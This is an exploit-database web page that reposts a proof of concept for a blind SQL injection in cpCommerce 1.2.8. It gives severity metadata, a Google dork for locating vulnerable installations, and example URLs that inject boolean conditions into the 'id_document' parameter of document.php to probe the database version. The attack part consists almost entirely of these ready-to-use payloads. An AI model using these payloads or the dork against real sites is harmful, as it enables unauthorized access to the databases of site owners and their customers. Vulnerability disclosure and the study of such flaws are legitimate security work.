Advertisement






cpCommerce 1.2.8 'id_document' Blind SQL Injection

CVE Category Price Severity
N/A CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2020-05-11
CPE
cpe:cpe:/a:cpcommerce:1.2.8
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 0.039 0.8434

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020050100

Below is a copy:

cpCommerce 1.2.8 'id_document' Blind SQL Injection
# Exploit Title: cpCommerce 1.2.8 'id_document' Blind SQL Injection 
# Date: 2020-05-09
# Author: Milad Karimi
# Contact: [email protected]
# Google Dork: intext:"Powered by cpcommerce"
# Version: 1.2.8
# Tested on: windows 10 , firefox
# CVE : CWE-89

Vulnerable file

 document.php

Exploit

   http://localhost/[path]/document.php?id_document=[SQL]
   http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=4
   http://localhost/[path]/document.php?id_document=1 and substring(@@version,1,1)=5
   
************************
* ==> Contact Me :
* Telegram : @Ex3ptionaL
* Email : [email protected] Email: [email protected]
* Instagram : @m.i.l.a.d_._k.a.r.i.m.i
************************ 

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.